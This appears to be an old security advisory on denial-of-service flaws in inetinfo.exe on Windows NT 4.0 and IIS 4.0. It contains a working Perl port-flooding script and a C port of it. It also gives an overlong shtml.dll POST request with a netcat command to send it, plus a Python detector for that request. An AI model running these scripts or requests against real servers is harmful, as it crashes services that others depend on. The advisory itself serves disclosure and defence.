COMMAND
inetinfo.exe
SYSTEMS AFFECTED
Win NT 4.0
PROBLEM
NT also appears to be vulnerable to the attack previously posted for
port 135 (connecting and throwing garbage at it), this time on another
port, namely 1031 (inetinfo). The inetinfo.exe process goes insane on
NT 4.0. This seems to be exploitable only locally. To try it, telnet
to port 1031 on an NT machine, type garbage, then disconnect. Credit
for this goes to Bob Beck. David Litchfield added that you don't even
need to type garbage: simply telnetting to port 1031 and then
disconnecting does the same job (localhost only, and it is not always
port 1031, as IIS chooses these ports randomly). Below is what Bob
Beck and Chris Bayly rigged up to check:
#!/usr/local/bin/perl
use Socket;
use FileHandle;
require "chat2.pl";      # old perl4-style chat library, must be in @INC
$ILoveBill = shift;      # target host, taken from the command line
$verbose = 0;            # set to 1 to print each port being hit
$knownports = 0;         # set to 1 to skip the known problem ports (135, 1031)
for ($port = 0; $port < 65535; $port++)
{
    if ($knownports && ($port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($ILoveBill, $port);
    next unless $fh;     # nothing listening on this port
    chat::print($fh, "Windows NT is the platform of the future");
    if ($verbose) {
        print "Trying port: $port\n\n";
    }
    chat::close($fh);
}
Evan L. Carew posted the following code, a ported version of the code
above (tested under Linux with GCC v2.7.2.3).
/* This program is not intended to be used to bring down NT */
/* servers or WIN95 clients but rather as a tool for finding */
/* weaknesses in your installations */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <unistd.h>     /* close() */
#define MAXPORTNUM 65535
int main (int argc, char **argv){
    int n, s, len;
    unsigned int soc = 0;   /* wider than u_short so the <= MAXPORTNUM loop terminates */
    char buf[1024];
    char *hostname;
    struct hostent *hp;
    struct sockaddr_in name;
    if(argc < 2){
        printf("Usage: %s hostname [hostname]\n", *argv);
        exit(1);
    }
    hostname = *++argv;
    hp = gethostbyname(hostname);
    if (hp == NULL){        /* unresolvable host: hp must not be dereferenced below */
        fprintf(stderr, "%s: unknown host\n", hostname);
        exit(1);
    }
    soc = 1;
    while (soc <= MAXPORTNUM){
        /* create a socket */
        s = socket(AF_INET, SOCK_STREAM, 0);
        memset(&name, 0, sizeof(struct sockaddr_in));
        name.sin_family = AF_INET;
        name.sin_port = htons(soc);
        memcpy(&name.sin_addr, hp->h_addr_list[0], hp->h_length);
        len = sizeof(struct sockaddr_in);
        printf("Trying port %i\n", soc);
        if (!connect(s, (struct sockaddr *)&name, len)){
            printf("connected to port %i\n", soc);
            strcpy(buf, "jfiebnfvmrur84j dfj494 40wetnt");
            len = strlen(buf);
            n = send(s, buf, len, 0);
        }
        close(s);
        ++soc;
    }
    exit(0);
}
Richard Bellamy came up with the following. Using that wonderful
little tool ported by l0pht from Hobbit's NetCat, he found that
sending the following request to port 80 of an IIS 4.0 server:
POST /_vti_bin/shtml.dll///////////////(and about 130,000 more of these)/ HTTP/1.0
causes Inetinfo to page fault; DRWATSON shows up and takes 100% CPU
time. He put the request in a text file and performed the following:
nc -v -v www.myserver.com 80 > send1.3.cap
The send1.3.cap file was approximately 128kb when it crashed Inetinfo
(when the send1.3.cap file was 96kb, Inetinfo worked just fine).
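As an added detection example (not from the advisory or from any of the people credited above), the following Python checks HTTP request lines for the overlong /_vti_bin/shtml.dll request pattern described above; the sample requests, the URI length threshold and the slash-run threshold are constructed assumptions, chosen well below the roughly 128kb size the advisory reports as fatal.

```python
import re

# Constructed sample request lines (not from the advisory): two benign,
# one shaped like the overlong shtml.dll request described above.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "POST /_vti_bin/shtml.dll/default.htm HTTP/1.0",
    "POST /_vti_bin/shtml.dll" + "/" * 130000 + " HTTP/1.0",
]

# Assumed thresholds: the advisory saw a crash at ~128kb and no crash at
# 96kb, so a much smaller limit still gives a wide margin.
MAX_URI_LEN = 8192
MAX_SLASH_RUN = 32

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/(?P<ver>\d\.\d)$")
SLASH_RUN = re.compile(r"/{2,}")


def inspect_request_line(line):
    """Return a list of finding strings for one request line (empty if clean)."""
    findings = []
    m = REQUEST_LINE.match(line)
    if not m:
        return ["malformed request line"]
    uri = m.group("uri")
    if len(uri) > MAX_URI_LEN:
        findings.append(f"oversized URI ({len(uri)} bytes)")
    # longest run of consecutive '/' characters anywhere in the URI
    longest = max((len(r.group(0)) for r in SLASH_RUN.finditer(uri)), default=0)
    if longest > MAX_SLASH_RUN:
        findings.append(f"slash run of {longest} characters")
    if uri.lower().startswith("/_vti_bin/shtml.dll") and findings:
        findings.append("targets FrontPage shtml.dll (matches inetinfo DoS pattern)")
    return findings


def scan(lines):
    """Map request-line index to its findings, skipping lines with none."""
    results = {}
    for idx, line in enumerate(lines):
        found = inspect_request_line(line)
        if found:
            results[idx] = found
    return results


if __name__ == "__main__":
    for idx, found in scan(SAMPLE_REQUESTS).items():
        print(f"request {idx}: " + "; ".join(found))
```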
SOLUTION
Not available at this moment. Anyway, check whether you need the
vulnerable ports. If you don't, GREAT, disable them!